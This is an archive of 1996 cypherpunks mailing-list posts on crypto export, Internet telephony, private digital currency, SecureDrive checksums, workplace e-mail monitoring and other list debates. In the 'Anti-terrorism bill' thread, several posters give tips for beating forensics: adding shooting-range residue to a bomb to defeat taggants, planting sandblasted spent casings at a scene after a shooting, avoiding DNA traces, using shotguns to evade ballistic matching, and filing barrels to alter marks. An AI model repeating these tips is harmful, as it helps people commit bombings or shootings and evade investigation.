From: Fallen Angel <fallenangel@multipro.com>
Date: Sat, 3 Aug 1996 21:01:49 +0800
To: cypherpunks@toad.com
Subject: problem
Message-ID: <3203D296.2E30@multipro.com>
MIME-Version: 1.0
Content-Type: text/plain


I unsubscribed from your mailing list so why am I still receiving 
email from it. I No longer wish to receive any more mail, so please stop 
it.

Fallen Angel
fallenangel@multipro.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 4 Aug 1996 01:57:04 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: algorithms for verifying U.S. IP address ...
In-Reply-To: <199608011606.JAA23574@ohio.chromatic.com>
Message-ID: <Pine.LNX.3.94.960803160517.150A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 1 Aug 1996, Ernest Hua wrote:

> Date: Thu, 1 Aug 1996 09:06:40 -0700
> From: Ernest Hua <hua@chromatic.com>
> To: cypherpunks@toad.com
> Cc: hua@chromatic.com
> Subject: algorithms for verifying U.S. IP address ...
> 
> How does one verify that an IP address is coming from a U.S. site?
> How do most FTP site (e.g. those which carry crypto) determine the
> origins of a connection?
> 
> It seems to me that if the NSA/DoS is serious about keeping crypto
> strong for U.S. internal use, then they would help establish a
> method for U.S.-only interchange of this sort of software.  It is
> clear, however, that they do NOT have an interest in helping with
> this identification effort as it will thwart their own efforts at
> tapping U.S. (er ... oh gee ... they're NOT suppose to do that,
> right?  okay, they must not be doing it then ...)
> 
> Ern
> 

You might want to look around on www.internic.net/ftp.internic.net...
they have a set of rules that define this.

 --Deviant
Try `stty 0' -- it works much better.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgN48DAJap8fyDMVAQEZ0gf/S0waHw/HaXSM2J5l0gQ8DWkcueTTtfHz
yZb8827kUh9eX6eNOq4ZITc9H563WLW0+KBjM7Uxy6Bijz3Hyq/mS3APLaBMysHo
zzRjFhSfCoBO1Jx7e6XrOHUb3wZQWw6TbvyyCypB14WA08NcvDlXFGanGhBM0fZM
Y+HwGpWY+uaCtR16RaDh/oyY0YNu7I0gOOrh4KuyNRE6Y+if82ABzTfNmZcp93Ob
s8mPrZFPKhsc+Mzu3nbmCmnSYTWCOLlWy58DNRzRHt7RlqAPlSDBAscncyJ/VDYz
nfAGBYiAUXVFm1owaEO0zRFKeQXsWQgJJwlVqfqXtN+cQSlDVH4MWQ==
=9cEF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 4 Aug 1996 06:39:06 +0800
To: cypherpunks@toad.com
Subject: Who the hell is ....
Message-ID: <TCPSMTP.16.8.3.-16.30.12.2645935021.659124@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> OK, I'v been on the list a bit now. I see a lot of the same
 In> people posting to it, 
 In> My question is " Who the Hell is Sternlight" At first I thought
 In> it was a pen name ( the light on the end of a boat ?? )

 Close... If you shone a light throught one ear, it would come out
 the other...


 P.J.
 pjn@nworks.com



... We are Hippies of Borg.  Make love.  War is irrelevant.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 4 Aug 1996 09:51:50 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Digital Telephony costs $2
Message-ID: <199608040010.RAA21627@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:52 AM 8/3/96 -0800, Chris Adams wrote:
>On 3 Aug 96 01:16:48 -0800, jimbell@pacifier.com wrote:
>
>> I propose that the better way of implementing it, rather than going through 
>>a sound card, is for modem manufacturers to built an  new modem with an 
>>extra telephone connection (perhaps the same physical connector that's 
>>currently used for the telephone handset) which goes to an ordinary 
>>telephone and does the audio A/D and D/A conversion, as well as the data 
>>compression/data expansion function that will be necessary.  The latter 
>>function would be done by an extra DSP on this modem/Internet telephone 
card. 
>
>If you were so inclined, you could implement the whole thing for MWave
>modems.  They are fast enough to handle 28.8k and sound card functions at
>the same time off of a single DSP. 

That seems a bit difficult to believe.  I get the impression that 
implementing a 28.8Kbps+ modem pretty much uses up the capability of a 
near-state-of-the-art DSP chip.  Further, recently an item appeared on CP 
concerning a new voice-compression standard that was claimed to put 
good-quality voice into a 2400 bps stream.   Each function, coding and 
decoding, was claimed to occupy about (don't recall the exact figures) a 
little over half the capability of a TI 32025 DSP chip, which admittedly is 
an older unit.  Assuming full-duplex is desired (and that's the purpose of 
this exercise) you'd need the full resources of something with greater 
'ooomph' than a 32025 just for the coding/decoding.

Sure,  it may not be necessary to compress voice audio all the way down to 
2400 bps, since the current modem standards allow 28.8kbps and beyond, but I 
suggest that decreasing net traffic by a factor of 12 (28.8k to 2.4k) is a 
desirable goal.  Remember, in the long term "everybody" will be using 
Internet telephone. (And no doubt you've noticed that high-volume hardware 
gets cheap, really fast.  Putting in a second DSP for compression/encryption 
won't increase the costs all that much.)  Leaving the encryption in hardware 
would improve exportability, at least from a legal/ITAR standpoint. 


 While eventually full-fiber-capacity Internet will be able to increase the 
capacity to "unlimited" levels, in the meantime the capacity is limited (by 
switches if nothing else) and going the extra mile to limit Internet 
telephone's impact on the national net would be better.


>With the right drivers you could use
>the telephone/speaker/mic jacks that are on most of the integrated cards.
>  Also, they have a standard realtime OS with most of the functions being
>portable across cards as well, so you'd have to do very little work to
>support other Mwave cards.

The reason I think a system I've described has a future is that modem 
manufacturers have a PROBLEM.  Their problem is that they've pretty much run 
out of room to improve the bit-pushing through a 3 KHz bandwidth.  Sure, 
they can focus their attention on cable modems or ISDN units or other toys, 
but the market for such beasts won't develop for a few years.  They'll 
pretty much be stuck doing an occasional upgrade, or selling into new 
computers, but that will slow down.  What they'd like to have is a new 
function that "everybody" wants to have, and allowing people to bypass LD 
telephone charges is a powerful motivating factor to get people to upgrade 
their modems.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 4 Aug 1996 10:04:17 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Liberating Clipper Stuff from Mykotronx Dumpsters
Message-ID: <2.2.32.19960804002934.00f11750@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 PM 8/3/96 -0400, Mark M. wrote:

>
>These files can also be found at ftp.funet.fi/mirrors/dsi/cypherpunks/clipper/
>mykotronx*, as the archives are still down.

Actually the path is:

ftp://ftp.funet.fi/mirrors/ftp.dsi.unimi.it/cypherpunks/clipper/

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 3 Aug 1996 15:24:51 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <199608030547.RAA30464@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>Some time ago on the list there was some discussion of putting together a CD
>full of cryptographic software and reference material. Nothing came of it, but
>I think several people expressed an interest
 
I have about 100MB (compressed) of crypto archives, papers, source code, etc
etc, reasonably well organised with descriptions of each file.  I've got a
friend to put it on CD, but only for my own use.  If there's someone who can
get them done in bulk outside the US you could probably use this as a crypto CD
(I don't think there's anyone in NZ who could do it, and I don't really want
the hassle of organising the whole thing).
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 4 Aug 1996 07:57:53 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <4tqcv0$2b1@life.ai.mit.edu>
Message-ID: <3203CC50.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hey folks, relax eh?

Its generally best when the police don't release every bit of
information on their investigations as they progress. Far from
criticising the police for having investigated Jewell on no or little
evidence you should criticise them for telling us about the evidence
they do have.

Although prosecuting a security guard in order to rob the terrorists of
publicity is a cute trick I don't think the US authorities are that
smart. In the past USGov has been less than sparkling in its ability to
keep a lid on secrets like that.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 4 Aug 1996 08:47:25 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS
In-Reply-To: <ae27b98904021004e701@[205.199.118.202]>
Message-ID: <v0300780cae297f34aa6d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:10 PM -0400 8/2/96, Timothy C. May wrote:
> (Examples abound in other areas, too, such as where large chip companies
> like Intel actually relish the vast amounts of paperwork they are required
> to fill out, becuase this overhead and legal burden can be handled by their
> buildings full of paper pushers, but helps to keep small companies from
> entering the market.

Milton Freedman observed this in "Free to Choose". He said something to the
effect that regulation only *helps* the existing players in any given
market by increasing barriers to entry, especially for smaller firms.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TrustBuckFella <TrustBuckFella@nowhere.com>
Date: Sun, 4 Aug 1996 09:51:45 +0800
To: cypherpunks@toad.com
Subject: TrustBucks
Message-ID: <htrb56rmj9@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
tcmay@got.net (Timothy C. May):
> You want to elaborate on this contention?
>
> If Alice transfers Digicash-type money to Bob, this is because Alice either
> bought the DC-money someplace, or already had it, or otherwise arranged
> with a bank to make the transaction. Maybe the bank "loaned" her money she
 
Mistaken terminology, mea culpa. The scheme I was thinking of is
actually called Private Currency. Someone mistakenly labelled the
writeup Digicash and I cut and pasted without thinking. I do know the
difference when my brain is on.
 
s/Digicash/Private Currency. Apologies to Digicash.
 
I'll explain Private Currency and why it's good and bad. In Private
Currency you don't "buy the [money] someplace". You mint it when paying.
Alice and Bob check each other's public debt and if neither is scared
off by the other's high debt, they mint a debt for Alice and money for
Bob. They publish a record of the transaction, which is how they knew
each other's public debt in the first step. So in theory the amount of
currency in existance is exactly 0. In practice I wouldn't trust anyone
for a debt that I didn't trust directly for that amount. I believe the
scheme would stall.
 
I conceived TrustBucks as an alternative that would retain the
decentralization but work.
 
> No protocols. No anonymity. No protection against double-spending.
>
> Looks promising. Keep us informed.
 
Fine. I doubt my mechanisms will be optimal but here you go.
 
Restraint on double-spending: Each participant publishes a list of the
    ID and value all outstanding TrustBucks of their own variety. Value
    of the notes can be obscured so it can only be verified by someone
    who has seen the note itself.
 
    What if some participant doesn't publish a complete list? Well, who
    are they robbing? People who directly trusted them for that amount
    and now won't ever again.
 
Anonymity: Each participant identifies their currency by a randomly
    chosen ID-number instead of name and publishes their ID/value under
    that number.
 
    However, it's pretty pointless, since the chain of trust has a hard
    time extending beyond people who directly know each other anyways.
 
 
A better objection would have been that it's hard to identify a chain of
mutually trusting links between two strangers who want to make a
transaction.
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQCVAwUBMgPoDJi7GCxryNrZAQHeEgQAmHsJithWMhmRv4y3IjnCBFKAgmZLCQ+i
NVYGDBVJ19iwAOTTwqHgcYMGEYdKBLUaBMRAczJDfGRbsB6WbFLKyiESHT8gpV7R
6CVesb7XpRaVDBylgTvoE/NNXfNrLrTfWOeVWtivMSVkDRKJC6BbONR1J5juhQjv
A9s1wa/uwSw=
=hsSY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 4 Aug 1996 13:56:23 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608040412.VAA06740@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 02 Aug 1996, jim bell <jimbell@pacifier.com> wrote:
>At 07:48 PM 8/2/96 -0500, Declan McCullagh wrote:
>> and black and smokeless powder taggants.
>
>Such materials will be easy to defeat.  Find an indoor shooting range, 
>vacuum up the powder residue that falls  in front of the shooting stalls, 
>and you'll have a concentrated mixture of literally hundreds of types of 
>taggants.  Add to bomb.  Laughing, at this point, is optional.
>
>Jim Bell
>jimbell@pacifier.com

In addition to powder residue, collect all the spent shell casings you can, 
especially ones that are of the same caliber as weapons you own. In addition to 
the possibility of reloading them (and saving a bundle on ammo costs) you can 
sprinkle them around liberally in the aftermath of an encounter (assuming you 
survive) and give the crime scene people a bunch of red herrings to deal with. 
Of course, you should never touch them, (the FBI got DNA samples from stamps the 
Unabomber licked on his mailbombs, so even tiny droplets of sweat can bust you) 
and you should collect the actual brass fired and sandblast it.

Incidentally, one of the interesting traits of a shotgun is that buckshot is not 
subject to the ballistics matching techniques used on rifle and pistol bullets. 
The plastic wads (which prevent the shot from touching the barrel) do not take 
the microscopically detailed impressions from the barrel that copper or lead 
bullets do. The heat from firing always melts the plastic slightly--enough to 
defeat this.  Of course, if you leave the fired shells lying around, the primer 
and ejector marks can bite you...

>     FOR IMMEDIATE RELEASE
>
>     MICRON COMMUNICATIONS, INC., ANNOUNCES AGREEMENT WITH THE FEDERAL
>     AVIATION ADMINISTRATION
>
>     Boise, Idaho, August 2, 1996 - Micron Communications, Inc., today
>     announced a Cooperative Research and Development Agreement (CRDA)
>     with the Federal Aviation Administration (FAA) to develop a model
>     Positive Passenger Baggage Matching (PPBM) system. The objective
>     of this PPBM system is to automatically recognize when baggage has
>     been placed on an aircraft without an associated passenger.

Of course, this means that every time they lose your luggage, you will be 
detained for "suspected terrorist activity", and the plane your luggage was 
wrongly sent to will be evacuated while the bomb squad takes it to a remote area 
and blows it up... (the luggage, not the plane)

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sun, 4 Aug 1996 14:21:32 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: fbi, crypto, and defcon
Message-ID: <199608040258.VAA06801@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 8:50 8/2/96, Paul J. Bell wrote:
>An international phone call costs about 2 cents/min to produce. The average
>rate paid for by the consumer is 62 cents. That's means the carriers mark
>up this particular product by an amazing 3000%.
>
>Can you name another business that has comparable mark-ups?
The Medical Industry.
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 4 Aug 1996 14:49:26 +0800
To: cypherpunks@toad.com
Subject: More to be paranoid about...
Message-ID: <2.2.32.19960804051419.00b3eaec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Take a look at:

     http://www.spiritone.com/cgi-bin/plates

Feed it an Oregon licence plate number and it will feed you back all sorts
of info about the person/victim.

The uses for such things are only limited by an evil imagination...


---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 4 Aug 1996 15:47:58 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <199608040258.VAA06801@sr.radiks.net>
Message-ID: <199608040606.XAA20028@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> >At 8:50 8/2/96, Paul J. Bell wrote:
> >An international phone call costs about 2 cents/min to produce. The average
> >rate paid for by the consumer is 62 cents. That's means the carriers mark
> >up this particular product by an amazing 3000%.
> >
> >Can you name another business that has comparable mark-ups?
> The Medical Industry.
> PGP encrypted mail preferred.  
> E-Mail me for my key.
> Scott J. Schryvers <schryver@radiks.net>

You guys are confused.  The actual telephone call may cost only 2
cents/min, but the accounting and billing procedures are way more
expensive.  As long as they are doing any kind of usage-based
charging, that actual act of charging will continue to cost
considerably more than the data transmission.

Why do you think sending long-distance IP packets is basically free?

- Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 4 Aug 1996 08:57:19 +0800
To: ichudov@algebra.com
Subject: Re: Corporate e-mail policy
In-Reply-To: <199608022351.SAA14955@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.960803230601.6988E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 2 Aug 1996 ichudov@algebra.com wrote:

> George Kuzmowycz wrote:
> >   In an ideal world, the rest of the group would agree with me and say
> > "Yup, we have no business reading e-mail." Since that's not likely,
> > I'm looking for examples of "privacy-friendly" corporate policies
> > that I can put on the table in our meetings, and end up with a
> > minority report.  
> > 
> 
> Maybe it is only me, but I recommend "privacy-fascist" policy. This way
> employees will at least know to keep their own business out of computers
> that will be monitored by the company anyways.
> 

I think you need to take the "fascist" approach, at least officially. I 
would hope that, unofficially, you don't monitor, eavesdrop, etc., unless 
a problem requires you to. (such as receiving email from another site 
that attacks have been detected, originating from your systems, etc.)

If you don't take the "fascist" approach, you are granting employees a
"reasonable expectation of privacy", which you cannot, in truth, provide 
(without spending a lot of additional money). Once you've put your 
company in this position, you've now set them up for an employee to have 
their "privacy" violated, so you've increased the company's risk. The 
benefits of running a "privacy friendly" corporate system just don't 
outweigh the costs and risks.

If somebody wants to read alt.sex.whatever-floats-their-boat, I really
don't care, but I don't want to be in the position of ensuring their
privacy while doing so on corporate equipment; they can get their own 'net
account and play at home. 

I prefer to put out an official "fascist sysadmin's system use policy", 
and then leave users to themselves, as long as I don't get any complaints 
of illegal activity that could land my company in hot water. What you 
publish as a use policy, and what you actively enforce do not have to be 
the same.

Just my $.02.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 4 Aug 1996 13:35:55 +0800
To: koontz@netapp.com (Dave Koontz)
Subject: Re: ITAR
Message-ID: <199608040339.XAA24208@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Aug 96 at 16:50, Dave Koontz wrote:

> How about exporting programs, that when executed generate source code for
> encryption algorithms?

Nope.

There already are such things.  Make a .zip archive and convert it 
into a self-extracting program.

Rob
 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 4 Aug 1996 13:31:54 +0800
To: cypherpunks@toad.com
Subject: Crypto added to anti-terror bill in US at last minute?!?!!
Message-ID: <199608040346.XAA24376@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


>From ACLU's site: http://www.aclu.org/issues/cyber/terror.html 

     The latest understanding from ACLU's legislative representatives is
     that the
     "Anti Terrorism" bill that is expected to be acted on today and
     tomorrow will include government controls on encryption -- a
     scheme for key escrow of private keys for encryption. It is also
     likely to include expanded use of wiretapping without a Court
     order. 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 4 Aug 1996 13:44:35 +0800
To: cypherpunks@toad.com
Subject: Disregard that last bit of FUD...
Message-ID: <199608040350.XAA24481@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Nevermind. I realized the ACLU excerpt I sent out wasn't so up to 
date (or was it...?)

Rob
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@garg.campbell.ca.us (Edgar Swank)
Date: Sun, 4 Aug 1996 10:34:22 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News
Message-ID: <3203ee7d.1399699@news.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SecureDrive Users:

It's been brought to my attention that the detached signatures
for two executable files in SECDR14B.ZIP don't verify.

   COPYSECT.EXE
   FPART.EXE

These were supposed to be identical to the 1.4/1.4a files, so the
same signatures were used. It seems the files were inadvertantly
re-compiled with a different version compiler, hence the mismatch.
Anyone concerned, can use the files from SECDR14A.ZIP, which are
still available, and should match the signatures.

It's also been said by a couple of correspondents that the listing
of CRC values from PKZIP could be easily counterfeited. Accordingly,
here is a list of MD5 digest values for SECDR14B.ZIP and all contained
files.

  CHK-SAFE.EXE Ver 2.51 by Bill Lambdin Don Peters and Robert Bullock.
  MD5 Message Digest Algorithm by RSA Data Security, Inc.

    File name     Size     Date    Time        MD5 Hash
  ________________________________________________________________________
  SECDR14B.ZIP   132389  07-21-96  05:23  8de408deac3499a458764a50f691eca0
  SECDRV.DOC      54081  07-20-96  19:45  9807d8301ec46f4d3903fbd5fe5ac438
  LOGIN.EXE       43718  07-20-96  20:12  b0ab456fb143c37855000bd0a9650482
  CRYPTDSK.EXE    42564  07-20-96  20:12  025f07b300e398792c5ce2d309881cd0
  SECTSR.ASM      32595  08-06-95  00:00  4d0ee685a96ef26e574809dcf4b0b96e
  CRYPTDSK.C      20623  07-20-96  19:34  0a8d238492fd0b37090a7b7f527903e8
  CRYPT2.ASM      19664  11-19-93  21:42  d774eca62b4ba6552e1cda74f2b4f05d
  LOGIN.C         18598  07-20-96  19:41  c2850e1427e2eb7126df83b720b57ce5
  COPYING         18321  06-14-93  22:27  ad4652e2dcfd4a0ecf91a2c01a7defd5
  FPART.EXE       15466  07-20-96  20:12  bac8c6e72f99983e132fec7cf6ca9b48
  SDCOMMON.C      14998  06-12-96  18:06  18ec797c194c4c34b81c5185c861065a
  SETENV.ASM      13011  07-20-96  19:48  9b52beb40986d9df4bcce09bbf5d80e5
  COPYSECT.EXE    12606  07-20-96  20:12  dbe7ae98b6d187d9904ddff72515c72a
  MD5.C           11557  05-09-93  19:38  951169a660ad48449ab6c0cbe20f3d3b
  KEY.ASC          5278  11-14-95  20:52  3a9040d3863aaffd030b570173e38b5d
  FPART.C          4353  08-06-95  00:00  963aaaf429a6de80133aa0856ac8c424
  SECDRV.H         3656  08-06-95  00:00  2e29ce5abbd5085503aee10a2adda26b
  MD5.H            3407  05-11-93  12:49  3b254fd2c035f3081ca2ec96ea120f9a
  COPYSECT.C       2022  08-06-95  00:00  91f9b9da8addd893cf71e3fc6f8e7bf7
  SECTSR.COM       2000  07-20-96  20:12  7ab3ea1e58673bb81158ac20e663836d
  MAKEFILE         1554  08-06-95  00:00  6e58f4269326251b342d5d7971ddac54
  RLDBIOS.ASM      1355  01-21-94  08:44  dbfe21f1440f2021ce04738b95a5e3ec
  USUALS.H         1254  05-09-93  19:39  270fa89c0ff884ee10d1a02a1ff9040d
  FILE_ID.DIZ       278  12-06-95  20:33  343cf830a0975aaaef88327625c97396
  COPYSECT.SIG      152  08-06-95  00:00  7a208bb9c283ca3574578edb4215457d
  CRYPTDSK.SIG      152  06-01-96  01:10  d4eba61786e984d2b3e7576c5629abb8
  FPART.SIG         152  08-06-95  00:00  82462ce35887ebdc57fb603521e34263
  LOGIN.SIG         152  06-01-96  01:09  7fc1f6d8a3292c50b6b790603cf3fa2c
  SECTSR.SIG        152  08-06-95  00:00  a4cebfb7b0e69a0b678ed3382aeff9a2

The CHK-SAFE program can be obtained at

  ftp://ftp.simtel.net/pub/simtelnet/msdos/fileutil/cs-251.zip

Regards,

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Home Page: http://members.tripod.com/~EdgarS/index.html
Author of SecureDrive Version 1.4b

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgPttN4nNf3ah8DHAQGCUAP/QMI92acYiyV4v739rvIDM/MVe08+6D+D
ZGGZ0dKgSxHLBV9iO+u754R+A3aUGXUM8PFHjGLRFjytFs+dLWo8w5XMqnOYZasJ
26hTSWzgzubNzV2jrnOlcHi4mw5+v5kOjnFycORXaJ/1pNjB2LIB+98DwujPdYDt
M+tD0ojh8vc=
=KkGX
-----END PGP SIGNATURE-----

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Home Page: http://members.tripod.com/~EdgarS/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 4 Aug 1996 14:35:34 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <2.2.32.19960803071838.006b0808@gonzo.wolfenet.com>
Message-ID: <Pine.SV4.3.91.960804003919.3390F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I wouldn't lift a finger to _shut down_ "Food Not Bombs" , but they are 
not the same as a Boyscout Picnic.

A boyscout picnic is a private party. Some people got invited to eat the 
food, any others who do are stealing.

FoodNotBombs just gave away stuff to all comers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 4 Aug 1996 15:26:20 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030921.EAA12012@einstein>
Message-ID: <Pine.SV4.3.91.960804004443.3390G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> perhaps a simple publicity stunt to get their 15 minutes and not realy
> to help the homeless/foodless?

    How could such a thing be. O mon dieu. I am shocked, I tell you - 
shocked!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 4 Aug 1996 14:33:32 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: SOUP KITCHENS (fwd)
In-Reply-To: <199608031110.GAA12116@einstein>
Message-ID: <Pine.SV4.3.91.960804005129.3390I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Famine and inadequate nourishment does weaken the stamina and 
survivability of individuals in the Third World, but the main problem is 
non-access to (what we consider to be) simple, basic medical modalities. 
Untold numbers of African babies die of not-very-virulent diseases, 
because they becomes fatally dehydrated. In the West, these babies 
revieve IV fluids which carries them over the critical period. In a 
village that is three days walk to a bus which takes 16 hours to get to a 
clinic that has IV needles and sterile fluids, the baby WILL die.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 4 Aug 1996 14:40:47 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608031145.GAA12155@einstein>
Message-ID: <Pine.SV4.3.91.960804005911.3390J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Since the inflation rate on a dollar is flat across the board in our economy
> simple inflation does not account for this rise in prices in a niche market.


   No. The COnsumer Price Index (the Bureau of Labor Statistics also puts
out the Producer Price Index, but that is not as widely reported in the
cartoon-news mass media), _is_ a single number, but only because it is
_defined as_ a measure of central tendency of all the price rises. It is
an artificial number. Each individual price rise, does swing freely. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 4 Aug 1996 17:57:55 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <199608040412.VAA06740@dfw-ix10.ix.netcom.com>
Message-ID: <FsF5RD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


JonWienk@ix.netcom.com writes:
> Incidentally, one of the interesting traits of a shotgun is that buckshot is
> subject to the ballistics matching techniques used on rifle and pistol bullet
> The plastic wads (which prevent the shot from touching the barrel) do not tak
> the microscopically detailed impressions from the barrel that copper or lead
> bullets do. The heat from firing always melts the plastic slightly--enough to
> defeat this.  Of course, if you leave the fired shells lying around, the prim
> and ejector marks can bite you...

Is there truth to the rumor that poking a file inside the barrel will
alter the marks on future test firings?

---

Dr.Dimitri Vulis KOTM
